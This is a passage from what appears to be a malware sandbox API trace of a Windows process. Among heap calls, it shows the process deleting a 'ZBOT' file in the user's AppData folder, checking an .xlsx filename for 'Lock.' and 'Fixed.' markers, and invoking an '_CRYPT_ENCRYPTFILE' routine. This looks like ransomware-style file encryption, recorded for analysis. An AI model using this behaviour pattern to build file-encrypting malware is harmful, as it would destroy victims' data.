dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0241.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.869] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0241.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0241.870] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0241.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6a) returned 0x2e564e0 [0241.870] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZBOT YHAwSRJf tb.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZBOT YHAwSRJf tb.wav", lpFilePart=0x8cedf4*="ZBOT YHAwSRJf tb.wav") returned 0x34 [0241.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0241.870] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZBOT YHAwSRJf tb.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zbot yhawsrjf tb.wav")) returned 0x20 [0241.870] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZBOT YHAwSRJf tb.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49221180, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xc9d842b0, ftLastAccessTime.dwHighDateTime=0x1d5e779, ftLastWriteTime.dwLowDateTime=0xc9d842b0, ftLastWriteTime.dwHighDateTime=0x1d5e779, nFileSizeHigh=0x0, nFileSizeLow=0x1472a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ZBOT YHAwSRJf tb.wav", cAlternateFileName="ZBOTYH~1.WAV")) returned 0xa87110 [0241.871] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZBOT YHAwSRJf tb.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zbot yhawsrjf tb.wav")) returned 1 [0241.910] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49221180, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xc9d842b0, ftLastAccessTime.dwHighDateTime=0x1d5e779, ftLastWriteTime.dwLowDateTime=0xc9d842b0, ftLastWriteTime.dwHighDateTime=0x1d5e779, nFileSizeHigh=0x0, nFileSizeLow=0x1472a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ZBOT YHAwSRJf tb.wav", cAlternateFileName="ZBOTYH~1.WAV")) returned 0 [0241.911] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0241.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0241.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0241.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0241.911] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0241.911] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0241.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0241.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0241.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0241.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0241.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0241.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6a) returned 0x2e564e0 [0241.912] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZBOT YHAwSRJf tb.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZBOT YHAwSRJf tb.wav", lpFilePart=0x8cf650*="ZBOT YHAwSRJf tb.wav") returned 0x34 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0241.912] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZBOT YHAwSRJf tb.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zbot yhawsrjf tb.wav")) returned 0xffffffff [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.912] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0241.912] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.912] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZTd7YZt.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Td7YZt.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d7YZt.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7YZt.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZt.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zt.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0241.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0241.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0241.914] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0241.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0241.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x2e79310 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0241.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZTd7YZt.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Td7YZt.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d7YZt.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0241.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7YZt.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0241.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZt.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zt.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0241.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.915] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0241.915] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0241.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0241.915] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0241.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0241.916] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 